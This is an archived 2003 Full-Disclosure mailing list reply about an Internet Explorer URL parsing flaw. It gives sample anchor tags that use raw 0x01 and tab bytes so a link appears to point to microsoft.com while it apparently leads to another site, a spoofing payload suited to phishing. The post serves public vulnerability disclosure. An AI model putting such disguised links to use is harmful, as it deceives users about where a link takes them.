[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

RE: [Full-Disclosure] Re: Internet Explorer URL parsing vulnerability

To: "Funk Jr, Joseph C." <jcfunkjr@co.bucks.pa.us>
Subject: RE: [Full-Disclosure] Re: Internet Explorer URL parsing vulnerability
From: Jarkko Turkulainen <jt@klake.org>
Date: Thu, 11 Dec 2003 18:36:03 +0200 (EET)

> https://paypal.com  Although I did notice that the <button> seems to be a
> requirement for this vulnerability to work, as using a plain hyperlink
> <a href> fails for me.

I managed it to get working by using raw 0x01 character in url:

<a href='http://www.microsoft.com 0x01 @other_site>

Of course, you must use hex editor to insert the 0x01. Some other
interesting effects can be achieved with:

<a href='http://www.microsoft.com 0x09 0x09 0x09 0x09 0x09 0x09 0x01 0x01
.. many more 0x01's .. 0x01 @other_site


Regards,

--
Jarkko Turkulainen <jt@klake.org>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

References:
- RE: [Full-Disclosure] Re: Internet Explorer URL parsing vulnerability
  - From: "Funk Jr, Joseph C." <jcfunkjr@co.bucks.pa.us>

Prev by Date: RE: [Full-Disclosure] The *real* reason the pivx unpatched IE flaws page was taken offline?
Next by Date: Qwik-Fix >> was: [Full-Disclosure] The *real* reason the pivx unp atched IE flaws page was taken offline?
Previous by thread: Re: [Full-Disclosure] Re: Internet Explorer URL parsing vulnerability
Next by thread: RE: [Full-Disclosure] Re: Internet Explorer URL parsing vulnerability
Index(es):
- Date
- Thread